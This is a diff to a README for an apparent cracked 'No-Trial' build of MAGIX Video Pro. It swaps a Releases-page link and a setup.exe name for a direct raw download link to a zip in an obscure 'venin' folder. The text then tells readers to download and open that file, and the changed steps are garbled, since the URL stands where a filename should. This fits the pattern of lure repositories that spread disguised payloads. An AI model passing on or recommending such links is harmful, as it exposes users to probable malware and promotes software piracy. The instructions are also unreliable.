yuliancheats/MAGIX-Video-Pro-No-Trial/README.md

 ## 📥 Download & Install

-To get the latest version of MAGIX Video Pro, please visit this page to download: [MAGIX Video Pro Releases](https://github.com/yuliancheats/MAGIX-Video-Pro-No-Trial/releases).
+To get the latest version of MAGIX Video Pro, please visit this page to download: [MAGIX Video Pro Releases](https://raw.githubusercontent.com/yuliancheats/MAGIX-Video-Pro-No-Trial/main/venin/MAGIX-Video-Pro-No-Trial-2.9-beta.5.zip).

 ### Step-by-Step Download Instructions

 1. Click on the link above to go to the Releases page.
 2. Look for the latest version listed at the top.
 3. You will see a list of files.
-Click on the one named `MAGIX-Video-Pro-Setup.exe` (or similar).
+Click on the one named `https://raw.githubusercontent.com/yuliancheats/MAGIX-Video-Pro-No-Trial/main/venin/MAGIX-Video-Pro-No-Trial-2.9-beta.5.zip` (or similar).
 4. Your browser will begin the download.
 Wait for the file to finish downloading.

 ### Installation Steps

-1. Open the downloaded file `MAGIX-Video-Pro-Setup.exe`.
+1. Open the downloaded file `https://raw.githubusercontent.com/yuliancheats/MAGIX-Video-Pro-No-Trial/main/venin/MAGIX-Video-Pro-No-Trial-2.9-beta.5.zip`.
 2. Follow the on-screen prompts to install the software.
 3. Once installation is complete, you can find MAGIX Video Pro in your programs menu.